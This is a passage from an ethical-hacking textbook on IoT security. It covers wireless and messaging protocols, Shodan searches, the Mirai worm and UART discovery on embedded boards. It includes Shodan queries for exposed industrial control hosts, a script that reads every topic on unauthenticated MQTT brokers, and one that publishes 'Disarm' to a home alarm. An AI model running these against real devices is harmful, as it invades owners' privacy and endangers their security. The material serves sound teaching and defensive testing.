                      PART IV

               Hacking IoT

Chapter 19   Internet of Things to Be Hacked
Chapter 20   Dissecting Embedded Devices
Chapter 21   Exploiting Embedded Devices
Chapter 22   Software-Defined Radio
This page intentionally left blank
  Internet of Things
  to Be Hacked
                                                                             CHAPTER

                                                                                         19
  In this chapter, we cover the following topics:
      • Internet of Things (IoT)
      • Shodan IoT search engine
      • IoT worms: It was a matter of time

This chapter covers the topic of Internet-connected devices, called the Internet of Things
(IoT). The phrase “Internet of Things” was first coined in a 1999 presentation at MIT
by Kevin Ashton.1 In 2008, the number of connected devices surpassed the number of
humans on the planet at 8 billion,2 so the security of these devices is becoming increas-
ingly important. The pace at which IoT devices are connected is staggering. Cisco
expects the number of IoT devices to exceed 14 billion by 2023.3 Think about that for
a moment: that is almost two connected devices for each human on the planet by 2023.
With connected devices controlling an increasing amount of our lives and even acting
on our behalf, it is crucial to understand the security risks these devices impose on their
unsuspecting users, if misconfigured, poorly designed, or just connected to the Internet
with default credentials.

Internet of Things (IoT)
The Internet of Things may very well become the Internet of things to be hacked if we
are not careful.4 In fact, as we discuss in this chapter, we are already too late, and this
statement is well on its way to becoming a reality. What is really scary is that users often
trade convenience over security and are currently not as concerned about security as we
security professionals would prefer.5

Gray Hat Hacking: The Ethical Hacker’s Handbook
              Types of Connected Things
              There are various types of connected things: some are of large form factors, such as
              robotic machines in factories, and others are very small, such as implanted medical
              devices. The smaller devices suffer from limitations that affect security, such as limited
              memory, processing capacity, and power requirements. Power sources include batteries,
              solar, radio frequency (RF), and networks.6 The scarcity of power, particularly in remote
              small devices, is a direct threat to security controls such as encryption, which might be
              deemed too expensive, power-wise, and therefore be left out of the design altogether.
                 The list of connected things is too long to provide here, but to get you thinking of the
              various potential security issues, the following short list is provided:7

                    • Smart things Smart homes, appliances, offices, buildings, cities, grids, and so on
                    • Wearable items Devices for the monitoring of movement, such as fitness
                      and biomedical wearables (for example, smart devices with touch payment and
                      health-monitoring options)
                    • Transportation and logistics RFID toll sensors, tracking of shipments, and
                      cold chain validation for produce and medical fluids (such as blood and medicine)
                    • Automotive Manufacturing, sensors on cars, telemetry, and autonomous driving
                    • Manufacturing RFID supply chain tracking, robotic assembly, and part
                      authenticity
                    • Medical and healthcare Health tracking, monitoring, and delivery of drugs
                    • Aviation RFID part tracking (authenticity), UAV control, and package delivery
                    • Telecommunications Connecting smart devices with GSM, NFC, GPS,
                      and Bluetooth
                    • Independent living Telemedicine, emergency response, and geo-fencing
                    • Agriculture and breeding Livestock management, veterinarian health tracking,
                      food supply tracking and cold chaining, and crop rotation and soil sensors
                    • Energy industry Power generation, storage, delivery, management, and payment

              Wireless Protocols
              Most connected devices have some form of wireless communication. The wireless proto-
              cols are described in the following sections.

              Cellular
              Cellular networks, including GSM, GPRS, 3G, 4G, and 5G, are used for long-range
              communications.8 This form of communication is helpful when great distances exist
              between nodes, such as connected buildings, automobiles, and smartphones. At the time
              of this writing, this form of communication remains the most secure of the alternatives
              and is difficult to attack directly, but it may be jammed.
                                                                     Chapter 19: Internet of Things to Be Hacked
Wi-Fi
The venerable IEEE 802.11 protocol has been in place for decades and is well known
and understood. Of course, there are many security issues with Wi-Fi that are also well
known. This form of communication has become the de facto standard for mid-range
communications of connected devices.9

Zigbee
The IEEE 802.15.4 protocol is a popular standard for short-to-medium-range com-
munications, normally up to 10 meters and in some conditions up to 100 meters. The
protocol is very useful in applications with low power requirements. The protocol allows
for a mesh network, enabling intermediate nodes to relay messages to distant nodes.10
Zigbee operates in the 2.4 GHz range, which competes with Wi-Fi and Bluetooth.

Z-Wave
The Z-Wave protocol is also a popular standard used in the short-to-medium range, but
it also offers a longer range due to the lower frequency (908.42 MHz in the US). Due
to the separate frequency range, it does not compete with other common radios such as
Wi-Fi and Bluetooth and experiences less interference.

Bluetooth (LE)

                                                                                                                   PART IV
The ubiquitous Bluetooth protocol has undergone a facelift of late and has been reborn
as Bluetooth Low Energy (LE), emerging as a viable alternative.11 Although it is back-
ward compatible with Bluetooth, the protocol is considered “smart” due to its ability to
save power.12 As with Zigbee and Z-Wave, Bluetooth and Bluetooth LE cannot commu-
nicate directly with the Internet; they must be relayed through a gateway device, such as
a smartphone or smart bridge/controller.

6LoWPAN
The Internet Protocol version 6 (IPv6) over Low-power Wireless Personal Area Networks
(6LoWPAN) is emerging as a valuable method to deliver IPv6 packets over 802.15.4
(Zigbee) networks. Because it can ride over Zigbee and other forms of physical networks,
it competes with Zigbee, but some would say it completes Zigbee because it allows for
connection with other IP-connected devices.13

Communication Protocols
IoT has several communication protocols—far too many to list—but here are a few of
the commonly used ones:14

   • Message Queuing Telemetry Transport (MQTT)
   • Extensible Messaging and Presence Protocol (XMPP)
   • Data Distribution Service for Real-Time Systems (DDS)
   • Advanced Message Queuing Protocol (AMQP)
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Security Concerns
              The traditional view of confidentiality, integrity, and availability applies to security
              devices, but often not in the same way. When it comes to traditional network devices,
              a premium is normally placed on confidentiality, then integrity, and then availability.
              However, when it comes to connected devices, the order is often reversed, with a pre-
              mium being placed on availability, then integrity, and then confidentiality. This paradigm
              is easy to understand when we consider an embedded medical device that is connected
              via Bluetooth to the user’s phone and thereby the Internet. The primary concern is
              availability, then integrity, and then confidentiality. Even though we are talking about
              sensitive medical information, there is no need to be concerned with confidentiality if
              the device can’t be reached or trusted.
                  There are, however, some additional security concerns:

                    • Vulnerabilities may be difficult, if not impossible, to patch.
                    • Small form factors have limited resources and power constraints, often preventing
                      security controls such as encryption.
                    • Lack of a user interface makes the device “out of sight, out of mind.” It’s often
                      online for years with little to no thought on the owner’s part.
                    • Protocols such as MQTT have limitations, including no encryption, often no
                      authentication, and cumbersome security configuration, as you will see later in
                      this chapter.

              Shodan IoT Search Engine
              The Shodan search engine is focused on Internet-connected devices15 and is slowly becom-
              ing known as the Internet of Things (IoT). It is important to realize that this is not your
              father’s Google. Shodan searches for banners, not web pages. In particular, Shodan scans
              the Internet looking for banners it recognizes and then indexes that data. You can submit
              your own banner fingerprints and IPs for scanning, but that requires a paid license.
                                                                    Chapter 19: Internet of Things to Be Hacked
Web Interface
If you want to lose an afternoon, or even weekend, simply go to https://images.shodan.io
(requires $49/year membership). Perhaps you will find a large toddler, napping, as shown
next. (That’s a joke; this is obviously a tired adult and their dog.)

                                                                                                                  PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 On a more serious note, with a little more searching, using the search string “authen-
              tication disabled” and filtering on screenshot.label:ics, you’ll receive more interesting
              results (notice the “Stop” buttons).
                                                                     Chapter 19: Internet of Things to Be Hacked
   If you’re interested in industrial control systems (ICS) and are looking for devices
running some common ICS services, but not running other types of common services,
you can use the search string “port:502,102,20000,1911,4911,47808,448,18,18245,1
8246,5094,1962,5006,5007,9600,789,2455,2404,20547 country:US -ssh -http -html
-ident,” which yields the view shown in Figure 19-1.
   From this view, we can tell there are 672,501 potential ICS hosts running the ICS ser-
vices but not HTTP, HTML, SSH, and IDENT (which are common services). Further,
we can tell the most common cities, top services, and top organizations hosting these ICS
services. Of course, we would need to do further filtering and rule out honeypots—but
more on that later.

                                                                                                                   PART IV
Figure 19-1 Common ICS Services
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Shodan can be used to refine the search results and get stats with Facets, which allow
              the user to drill down into more stats related to the search. For example, by clicking
              “More…” under “Top Ports” on the left-hand pane shown in Figure 19-1, you will be
              presented with the following view with a list of products and the count of each. Further
              drilling can be done by changing the Facet in the drop-down.

              Shodan Command-Line Interface
              For those who prefer the command line, Shodan does not disappoint. It offers a powerful
              command-line tool, with full functionality, as you will see in the upcoming lab.

                                 NOTE The labs in this chapter were performed on Kali Linux 2021.1 (64 bit)
                                 but should work on other versions of Linux. Also, an API key is required from
                                 Shodan, which you can get for free by registering an account there.

              Lab 19-1: Using the Shodan Command Line

              In this lab, we will explore the Shodan command line. Current versions of Kali have the
              Shodan CLI installed; simply initialize it with your API key as follows:
              % shodan init <YOUR API KEY>
              Successfully initialized
                                                                       Chapter 19: Internet of Things to Be Hacked
  Next, test for credits available in your account:
% shodan info
Query credits available: 100
Scan credits available: 100

  Finally, run a scan to find VNC services (RFB), showing IP, port, org, and hostnames:
% shodan search --fields ip_str,port,org,hostnames RFB > results.txt
% wc -l results.txt
101 results.txt
% head -3 results.txt
186.10.40.11 8334 ENTEL CHILE S.A.   z210.entelchile.net
68.51.127.103     5901 Comcast Cable Communications, Inc. c-68-51-127-103.
hsd1.in.comcast.net
169.229.136.161   5900 University of California at Berkeley tol2mac5.soe.
berkeley.edu

   One feature of the command-line tool is the ability to check the honeyscore—a score
that tests whether a site is a honeypot using heuristics developed by Shodan:
% shodan honeyscore 54.187.148.155
Not a honeypot
Score: 0.5
% shodan honeyscore 52.24.188.77

                                                                                                                     PART IV
Honeypot detected
Score: 1.0

  Here is an example of using Facets like those used in Figure 19-1.
% shodan stats --facets city:3,product:3 "port:502,102,20000,1911,4911,47808
,448,18,18245,18246,5094,1962,5006,5007,9600,789,2455,2404,20547 country:US
-ssh -http -html -ident"
Top 3 Results for Facet: city
Kansas City                      317,769
Redwood City                     112,706
Mountain View                     63,421

Top 3 Results for Facet: product
Niagara Fox                            10,047
Niagara4 Station                        1,391
Red Lion Controls                       1,337

Shodan API
Others may prefer a Python interface to the Shodan data, and, of course, you can use
that too. The Shodan Python library comes with the Shodan command-line tools, but
the library may be installed separately, as well, using pip.
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 19-2: Testing the Shodan API

              In this lab, we test out the Shodan API. You need an API key; a free one will do for this
              test case because we are not using any filters. After installing the CLI, we will build a
              Python script to search for MQTT services that include the word alarm in the banner
              and are located in the US. This code and all code in this chapter can be found on the
              book’s download site and GitHub repository.
              ❶% sudo apt install python3-venv
              <truncated>
              ➋% python3 -m venv lab-19 && source ./lab-19/bin/activate
              ➌% pip install wheel
              Collecting wheel
                Using cached wheel-0.36.2-py2.py3-none-any.whl (35 kB)
              Installing collected packages: wheel
              Successfully installed wheel-0.36.2
              ➍% pip install shodan
              Collecting shodan
                Downloading shodan-1.25.0.tar.gz (51 kB)
                   |████████████████████████████████| 51 kB 389 kB/s <truncated>

                 In order to play with new Python libraries without corrupting the system Python
              library, it can be helpful to install the Virtual Environment for Python ➊. Install a new
              Virtual Environment and activate it ➋. In order to reduce complaints about wheel
              not being installed when we’re installing modules, we install wheel ➌. At this point,
              we can install any modules required for the lab without contaminating our system
              environment—for example, the shodan module ➍.
              % cat mqtt-search.py
              import shodan

              def shodan_search():
                    SHODAN_API_KEY = "YOUR API KEY"
                    SEARCH = "mqtt alarm country:US"
                    api = shodan.Shodan(SHODAN_API_KEY)

                        try:
                          results = api.search(SEARCH)
                          with open("mqtt-results.txt", "w") as f:
                              for result in results['matches']:
                                    searching = result['ip_str']
                                    f.write(searching + '\n')
                    except shodan.APIError as e:
                          pass
              shodan_search()

                  Next, we run the MQTT search and observe the results:
              % python mqtt-search.py
              % head -3 mqtt-results.txt
              104.248.4.175
              209.33.212.31
              198.199.109.124
                                                                      Chapter 19: Internet of Things to Be Hacked

Lab 19-3: Playing with MQTT

In the previous lab, the search string “mqtt alarm” was supplied to Shodan to identify
IP addresses running MQTT with an alarm listening. In this lab, we scan one of the
resulting IPs for additional information. The following code was adapted from an
example by Victor Pasknel.16
% pip install paho-mqtt
Collecting paho-mqtt
  Using cached paho-mqtt-1.5.1.tar.gz (101 kB)
Building wheels for collected packages: paho-mqtt
  Building wheel for paho-mqtt (setup.py) ... done
  Created wheel for paho-mqtt: filename=paho_mqtt-1.5.1-py3-none-any.whl
size=61546 sha256=11308bd024a1b7d8ac47fba699d135d81854d2aba6283d9088ae4fe3f78
66ff7
  Stored in directory: /home/kali/.cache/pip/wheels/22/b9/0f/9a1f64674f849b8a
e88620232f2023f0ff2a50a4479b8a32ed
Successfully built paho-mqtt
Installing collected packages: paho-mqtt
Successfully installed paho-mqtt-1.5.1
% cat mqtt-scan.py
import paho.mqtt.client as mqtt

                                                                                                                    PART IV
❶def on_connect(client, userdata, flags, rc):
   print("[+] Connection successful")
   client.subscribe('#', qos = 1) # Subscribes to all topics

➋def on_message(client, userdata, msg):
   print('[+] Topic: %s - Message: %s' % (msg.topic, msg.payload))
➌client = mqtt.Client(client_id = "MqttClient")
➍client.on_connect = on_connect
➎client.on_message = on_message
➏client.connect('IP GOES HERE - MASKED', 1883, 30)
➐client.loop_forever()

   This Python program is simple: after loading the mqtt.client library, the program
defines a callback for both the initial connection ➊ (print the connection message
and subscribe to all topics on the server) and when a message is received ➋ (print the
message). Next, the client is initialized ➌ and the callbacks are registered ➍ ➎. Finally,
the client is connected ➏ (be sure to change the masked IP on this line) and sent into
a loop ➐.

             NOTE No authentication is involved here (unfortunately), so no kittens were
             harmed in the filming of this movie!

  Next, we run the MQTT scanner:
root@kali:~# python mqtt-scan.py
[+] Connection successful
[+] Topic: /garage/door/ - Message: On
Gray Hat Hacking: The Ethical Hacker’s Handbook
              [+] Topic: owntracks/CHANGED/bartsimpson - Message:
              {"_type":"location","tid":"CHANGED","acc":5,"batt":100,"conn":"m","lat":-
              47.CHANGED00,"lon":-31.CHANGED00,"tst":CHANGED,"_cp":true}
              [+] Topic: home/alarm/select - Message: Disarm
              [+] Topic: home/alarm/state - Message: disarmed
              [+] Topic: owntracks/CHANGED/bartsimpson - Message:
              {"_type":"location","tid":"CHANGED","acc":5,"batt":100,"conn":"m","lat":-
              47.CHANGED01,"lon":-31.CHANGED01,"tst":MASKED,"_cp":true}

                  The output will be analyzed in the next section.

              Implications of this Unauthenticated Access to MQTT
              Much to our surprise, the output of the MQTT scanner shows the home not only has
              alarm information (disarmed) but garage status as well. Also, through the magic of the
              creepy OwnTracks app running on the user’s phone, we know the owner is not home and
              is on the move, because every few seconds new LAT/LONG data is provided. That’s like
              having a police scanner telling you how long until the owner is home. Wow, now that is
              scary! As if that weren’t bad enough, some home automation systems allow for writing,
              not just reading.17 Writing is done through the publish command, so instead of subscrib-
              ing, you can publish. For example, we can issue a fake command to a fake system (really,
              it does not exist; it is just an example).

                                 NOTE Issuing commands and changing the configuration on a system
                                 that does not belong to you might cross some legal lines and certainly
                                 cross ethical lines—unless you are authorized to test the system. You have
                                 been warned!

                 Here’s our fake system example (given for illustrative purposes only), again adapted
              from the example given by Victor Pasknel:18
              % cat mqtt-alarm.py
              import paho.mqtt.client as mqtt

              def on_connect(client, userdata, flags, rc):
                     print("[+] Connection success")
                     client.publish('home/alarm/set', "Disarm")

              client = mqtt.Client(client_id = "MqttClient")
              client.on_connect = on_connect
              client.connect('IP GOES HERE', 1883, 30)

              IoT Worms: It Was a Matter of Time
              In late 2016, attackers became upset with Brian Krebs, an Internet journalist who docu-
              mented several hacks, and knocked him offline using a massive distributed denial-of-
              service (DDoS) attack.19 Now, DDoS attacks are not uncommon, but what was new was
              the method of attack. For the first time in history, an army of vulnerable IoT devices,
                                                                      Chapter 19: Internet of Things to Be Hacked
namely cameras, were used in the attack. Further, DDoS attacks are normally reflective
types of attacks, whereby an attacker tries to amplify the attack by leveraging protocols
that require a simple command request and have a massive response. In this case, it was
not a reflective attack at all—just normal requests, coming from countless infected hosts,
that generated some 665 Gbps of traffic, nearly doubling the previous record.20 On the
sending end of the attack were Internet-connected cameras that were found by attackers
to have default passwords. The worm, dubbed Mirai, after a 2011 anime series, logs in
to Internet-based cameras using a table of more than 60 default passwords, commonly
known from different vendors. The worm was careful to avoid the United States Post
Office and Department of Defense IPs, but all others were fair game.21 The servers that
hosted Krebs’ website had no chance, and even their hosting service, Akamai, which
is known for protecting against DDoS attacks, dropped him after reportedly painful
deliberations.22 The Mirai worm hit others as well, becoming the most notorious worm
at that time and garnering much publicity and causing worldwide concern. Eventually,
copycats joined in and many Mirai variants sprung up.23 The number of infected hosts
nearly doubled to 493,000 after the source code was released.24
   At the time of this writing, there have been more than 60 Mirai variants.25 No longer
are attackers only checking for default passwords; authors of the IoT Reaper worm are
wielding vulnerabilities that leave millions of online cameras vulnerable.26 One thing is
for sure: IoT devices cannot hide, as this chapter has shown. If they are connected to the

                                                                                                                    PART IV
Internet, they will be found.

Prevention
Now that you have seen the implications of open systems with no authentication on the
Internet, here is some practical advice: hack yourself! Seriously, Shodan has many free
searches, so why not take advantage of that service—before someone else does? Conduct
a search of your home IP address, using www.whatismyip.com or a similar service, as
well as the IP addresses of your family members, business, or anyone you know. Another
valuable resource you should know about is the Internet of Things Scanner by BullGuard
(see the “For Further Reading” section). It allows you to scan your home and see whether
or not you are in Shodan.

Summary
In this chapter, we discussed the increasing array of Internet-connected things that
comprise the IoT and discussed the network protocols they use. Next, we explored the
Shodan search engine, which specializes in finding IoT devices. Finally, we discussed
what was bound to happen: the advent of IoT worms. After reading this chapter, you
should be better prepared to identify, protect, and defend your things and those of your
friends, family, and clients.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              For Further Reading
              “Distinguishing Internet-Facing Devices Using PLC Programming Information”
              www.hsdl.org/?abstract&did=757013
              Internet of Things Scanner by BullGuard iotscanner.bullguard.com/
              NIST Special Publication 800-82, Revision 2, “Guide to Industrial Control Systems
              (ICS) Security” nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
              “Quantitatively Assessing and Visualising Industrial System Attack Surfaces” www
              .cl.cam.ac.uk/~fms27/papers/2011-Leverett-industrial.pdf

              References
                   1. X. Xu, “Internet of Things in Service Innovation,” The Amfiteatru Economic Journal,
                      4(6, November 2012): 698–719.
                   2. M. Swan, “Sensor Mania! The Internet of Things, Wearable Computing, Objective
                      Metrics, and the Quantified Self 2.0,” Journal of Sensor and Actuator Networks,
                      1(3, November 8, 2012): 217–253.
                   3. Patrick Grossetete, “IoT and the Network: What is the future?,” Cisco, June 2020,
                      https://blogs.cisco.com/networking/iot-and-the-network-what-is-the-future
                   4. The Economist, “The Internet of Things (to Be Hacked),” July 12, 2014, https://
                      www.economist.com/news/leaders/21606829-hooking-up-gadgets-web-promises-
                      huge-benefits-security-must-not-be
                   5. Harper, “The Impact of Consumer Security Awareness on Adopting the Internet
                      of Things: A Correlational Study,” Dissertation, Capella University, 2016, https://
                      www.proquest.com/docview/1853097232/104B999B1316421EPQ/1
                   6. D. Bandyopadhyay, J. Sen, “Internet of Things: Applications and Challenges
                      in Technology and Standardization,” Wireless Personal Communications,
                      58(1, May 2011): 49–69.
                   7. Harper, “The Impact of Consumer Security Awareness on Adopting the Internet
                      of Things.”
                   8. Z. Chen, F. Xia, T. Huang, F. Bu, and H. Wang, “A Localization Method for the
                      Internet of Things,” The Journal of Supercomputing, 63(3, March 2013): 657–674.
                   9. H. Jayakumar, K. Lee, W. Lee, A. Raha, Y. Kim, and V. Raghunathan, “Powering
                      the Internet of Things,” in Proceedings of the 2014 International Symposium
                      on Low Power Electronics and Design, ACM, 2014, 375–380, http://doi.acm
                      .org/10.1145/2627369.2631644.
                 10. “Zigbee,” Wikipedia, 2017, https://en.wikipedia.org/w/index.php?title=Zigbee&
                     oldid=809655996.
                                                                   Chapter 19: Internet of Things to Be Hacked
11. Harper, “The Impact of Consumer Security Awareness on Adopting the Internet
    of Things.”
12. H. Jayakumar, et al., “Powering the Internet of Things.”
13. J. Sarto, “Zigbee vs. 6LoWPAN for sensor networks,” LSR, https://www
    .lairdconnect.com/resources/white-papers/zigbee-vs-6lowpan-for-sensor-networks.
14. S. Schneider, “Understanding the Protocols Behind the Internet of Things,”
    Electronic Design, October 9, 2013, www.electronicdesign.com/iot/understanding-
    protocols-behind-internet-things.
15. J. Matherly, Complete Guide to Shodan: Collect. Analyze. Visualize. Make Internet
    Intelligence Work for You, Lean Publishing, 2017.
16. V. Pasknel, “Hacking the IoT with MQTT,” Morphus Labs, July 19, 2017,
    https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b.
17. Pasknel, “Hacking the IoT with MQTT.”
18. Pasknel, “Hacking the IoT with MQTT.”
19. “Mirai (malware),” Wikipedia, 2017, https://en.wikipedia.org/w/index
    .php?title=Mirai_(malware)&oldid=807940975.
20. S. M. Kerner, “DDoS Attacks Heading Toward 1-Terabit Record,” eWEEK,

                                                                                                                 PART IV
    September 25, 2016, www.eweek.com/security/ddos-attacks-heading-toward-1-
    terabit-record.
21. “Mirai (malware),” Wikipedia.
22. Kerner, “DDoS Attacks Heading Toward 1-Terabit Record.”
23. B. Krebs, “New Mirai Worm Knocks 900K Germans Offline,” Krebs on Security,
    November 16, 2016, https://krebsonsecurity.com/2016/11/new-mirai-worm-
    knocks-900k-germans-offline/.
24. M. Mimoso, “Mirai Bots More Than Double Since Source Code Release,”
    October 19, 2016, https://threatpost.com/mirai-bots-more-than-double-since-
    source-code-release/121368/.
25. Lindsey O’Donnell, “Latest Mirai Variant Targets SonicWall, D-Link and IoT
    Devices” March 16, 2021, https://threatpost.com/mirai-variant-sonicwall-d-link-
    iot/164811/
26. T. Fox-Brewster, “A Massive Number of IoT Cameras Are Hackable—And Now the
    Next Web Crisis Looms,” Forbes, October 23, 2017, https://www.forbes.com/sites/
    thomasbrewster/2017/10/23/reaper-botnet-hacking-iot-cctv-iot-cctv-cameras/.
This page intentionally left blank
  Dissecting
  Embedded Devices
                                                                            CHAPTER

                                                                                       20
  In this chapter, we cover the following topics:
      • CPU
      • Serial interfaces
      • Debug interfaces
      • Software

This chapter provides a high-level view of embedded devices with the intention of pro-
viding a vocabulary for and high-level understanding of potential areas of concern.
Embedded devices are electrical or electro-mechanical devices that meet a specific
need or have a limited function. A few examples of embedded devices include security
systems, network routers/switches, cameras, garage door openers, smart thermostats,
controllable light bulbs, and mobile phones. As our devices gain remote connectivity for
our convenience, they also provide more opportunity for an attacker to enter our lives
through our networks.
   Much of the discussion in this chapter revolves around integrated circuits (ICs). An
IC is a collection of electrical components within a small package, often referred to as a
chip. A simple example is the quad 2-input OR1 gate IC, where four 2-input OR circuits
are implemented inside a single chip. In our case, the ICs will be much more complex
and contain the entire multiple-computing elements inside a single IC. Also, note that
this chapter assumes you are familiar with a multimeter and the basic concepts of electri-
cal circuits, such as voltage, current, resistance, and ground.

CPU
Unlike the desktop systems that most people are familiar with, the embedded world uses
many different processing architectures based on embedded functionality, required com-
plexity of the system, price, power consumption, performance, and other considerations.
Because embedded systems generally have much more defined functionality, they tend to
lend themselves to more quantifiable performance requirements. As a result, a blend of
software and hardware requirements are used to determine the appropriate microproces-
sor, microcontroller, or system on chip (SoC).

Gray Hat Hacking: The Ethical Hacker’s Handbook
              Microprocessor
              Microprocessors do not include memory or program storage internal to the chip. Micro-
              processor-based designs can utilize a large amount of memory and storage and can run
              sophisticated operating systems such as Linux. The common PC is an example of a
              device utilizing a microprocessor-based design.

              Microcontrollers
              Common within the embedded world is the microcontroller. The microcontroller gener-
              ally has a CPU core (or cores), memory, storage, and I/O ports, all within a single chip.
              The microcontroller is well suited to highly embedded designs that perform simple or
              well-defined lower-performance applications. Due to the simplicity of the applications
              and hardware, the software on the microcontroller is typically written in a lower language
              such as assembly or C and does not include an operating system (OS). Applications for
              a microcontroller include an electronic door lock and a TV remote.
                 Depending on the specific microcontroller, protections may be implemented in hard-
              ware to help secure the applications. Examples are read protections for the program
              storage and disabling the on-chip debugging interface from becoming active. Although
              these measures provide a layer of protection, there are no guarantees that the protections
              cannot be bypassed.

              System on Chip
              The System on Chip (SoC) is one or more microprocessor cores or microcontrollers with
              a wide variety of integrated hardware features within a single integrated circuit (IC). For
              example, the SoC for a phone may contain a graphics processing unit (GPU), sound pro-
              cessor, memory management unit (MMU), cellular, and network controller. The main
              benefit of the SoC is reduced cost due to fewer chips and smaller-size applications, which
              are typically used in a more custom fashion. Whereas a microcontroller stores the pro-
              gram internally and provides limited memory, the SoC typically utilizes external storage
              and memory.

              Common Processor Architectures
              Although there are many microcontroller architectures, such as Intel 8051, Freescale
              (Motorola) 68HC11, and Microchip PIC, two architectures show up much more in
              Internet-connected devices: ARM and MIPS. Knowing the processor architecture is
              important when using tools such as disassemblers, build tools, and debuggers. Identifica-
              tion of the processor architecture can typically be done by visually inspecting the board
              and locating the processor.
                 ARM is a licensed architecture that is used by many microprocessor, microcon-
              troller, and SoC manufacturers such as Texas Instruments, Apple, Samsung, and more.
              The ARM cores are licensed in multiple profiles based on the intended applications.
              ARM cores come in both 32- and 64-bit architectures and can be configured as either
              big- or little-endian. Table 20-1 illustrates the profiles and applications that would
              typically use them.
                                                                            Chapter 20: Dissecting Embedded Devices
 Profile           Description                                        Example Applications
 Application       The most powerful of the profiles. Its main        Mobile phones
                   distinguishing feature is the MMU, which allows    Tablets
                   it to run feature-rich operating systems such as   Set-top boxes
                   Linux and Android.
 Real-time         Designed for applications that require real-       Network routers and
                   time performance characteristics. Features low     switches
                   interrupt latency and memory protection. It        Cameras
                   does not contain an MMU.                           Cars
 Microcontroller   Designed for highly embedded systems with          Industrial controls
                   lower size and performance requirements.           Programmable lights
                   Features low interrupt latency, memory
                   protection, and embedded memory.
Table 20-1 ARM Profiles2

   MIPS, last owned by Wave Computing, which recently came out of bankruptcy, is no
longer being developed in favor of RISC-V; however, license agreements signed prior to
restructuring appear to be valid.3 MIPS has been licensed to several manufacturers, such
as Broadcom, Cavium, and others. Like ARM, MIPS has 32- and 64-bit variants and can

                                                                                                                      PART IV
be run in either big- or little-endian mode. It is commonly found in networking devices
such as wireless access points and small home routers.

Serial Interfaces
A serial interface communicates with a peer one bit at a time, serially, over a communica-
tion channel. Being that only one bit is being transmitted at a time, fewer pins are required
on an IC. In contrast, parallel interface communications transmit multiple bits at a time
and require more pins (one pin per bit). Several serial protocols are used in embedded sys-
tems, but we will only discuss the Universal Asynchronous Receiver-Transmitter (UART),
Serial Peripheral Interface (SPI), and Inter-Integrated-Circuit (I2C) protocols.

UART
The Universal Asynchronous Receiver-Transmitter protocol allows two devices to com-
municate serially over a communications channel. UART is commonly used for connect-
ing to a console to allow a human to interact with the device. Although most devices will
not have an externally available interface for communicating serially, many will have an
internal interface that was used during device development and testing. While perform-
ing device testing, I have found both authenticated and unauthenticated consoles on
internally accessible serial interfaces.
   UART requires three pins to communicate and usually comes in a gang of four pins
(see Figure 20-1). You may see labels on the board, but generally these pads or headers
are not labeled and need to be discovered. Although Figure 20-1 shows a nice example
where the headers stand out as candidates for serial communications, the layout of
the pins might not always be as straightforward and could be mingled within a larger
number of pins.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 20-1
              Unlabeled
              gang of four
              serial ports on a
              Ubiquiti ER-X

                 The main reason for locating and connecting to the internal serial ports is to attempt
              to locate information that was not intended to be accessible to the user of the system.
              For example, the web interface does not generally yield access to the file system directly,
              but the serial console on a Linux-based system will give the user access to the file system.
              When the serial port is authenticated, you will have to brute-force the credentials or
              attempt to bypass the authentication by altering the boot process (potentially by using a
              JTAG debug port).
                 To discover the serial pads, a tool such as JTAGulator, developed by Joe Grand, can
              be used to brute-force signals and yield the pad layout and baud rate. The following is
              an example of running the UART identification test against the Ubiquiti ER-X shown
              in Figure 20-1, where the labeled pins were identified using JTAGulator. Here are the
              steps involved:

                   1. Locate the headers or pads you believe could be UART by inspecting the board.
                      (Seeing two to four pads/pins grouped together on the board is a good sign, but as
                      mentioned earlier, they can be intermingled within other functional pads/pins.)
                   2. Discover the target voltage by probing the board with a multimeter or identifying
                      an IC and looking up the datasheet.
                   3. Discover a ground that is easy to connect to by measuring resistance (ohms)
                      between a known ground (such as the chassis ground) and pins that are easy to
                      connect to (effectively 0 ohms between the known ground and the pin in question).
                   4. Connect the board to your JTAGulator if you are fortunate enough to find
                      headers, or solder a header to the board and then connect (see Figure 20-2).
                                                                         Chapter 20: Dissecting Embedded Devices
Figure 20-2
Connection
between
JTAGulator and
Ubiquiti ER-X

                                                                                                                   PART IV
   5. Verify the version of JTAGulator firmware ❶. The version can be checked against
      the code on the repository at https://github.com/grandideastudio/jtagulator/
      releases. If the version is not the latest, follow the directions at www.youtube.com/
      watch?v=xlXwy-weG1M.
   6. Enable UART mode ❷ and set the target voltage ❸.
   7. Run the UART identification test ❹.
   8. On success, look for reasonable responses such as carriage returns, line feeds, or
      readable text ❺ (l-timers(q) sync).
   9. Verify the identified settings by running in pass-thru mode ❻ with the baud rate
      candidate ❼ (57600 in our case).
        < … Omitted ASCII ART …>
                 Welcome to JTAGulator. Press 'H' for available commands.
               Warning: Use of this tool may affect target system behavior!

      > h
      Target Interfaces:
      J   JTAG
      U   UART
      G   GPIO
      S   SWD

      General Commands:
      V   Set target I/O voltage
      I   Display version information
      H   Display available commands

      ➊> i
      JTAGulator FW 1.11
      Designed by Joe Grand, Grand Idea Studio, Inc.
      Main: jtagulator.com
Gray Hat Hacking: The Ethical Hacker’s Handbook
                       Source: github.com/grandideastudio/jtagulator
                       Support: www.parallax.com/support
                       ➋> u
                       ➌UART> v
                       Current target I/O voltage: Undefined
                       Enter new target I/O voltage (1.2 - 3.3, 0 for off): 3.3
                       New target I/O voltage set: 3.3
                       Ensure VADJ is NOT connected to target!

                       ➍UART> u
                       UART pin naming is from the target's perspective.
                       Enter text string to output (prefix with \x for hex) [CR]:
                       Enter starting channel [0]:
                       Enter ending channel [1]: 1
                       Are any pins already known? [y/N]: N
                       Possible permutations: 2
                       Enter text string to output (prefix with \x for hex) [CR]:
                       Enter delay before checking for target response (in ms, 0 - 1000) [10]: 0
                       Ignore non-printable characters? [y/N]: N
                       Bring channels LOW before each permutation? [y/N]: N
                       Press spacebar to begin (any other key to abort)...
                       JTAGulating! Press any key to abort...

                       TXD: 0
                       RXD: 1
                       Baud: 9600
                       Data: h.XZ...c)...H.oB [ 68 FC 58 5A E5 9E C9 63 29 DD 0A DC 48 84 6F 42 ]

                       TXD: 0
                       RXD: 1
                       Baud: 14400
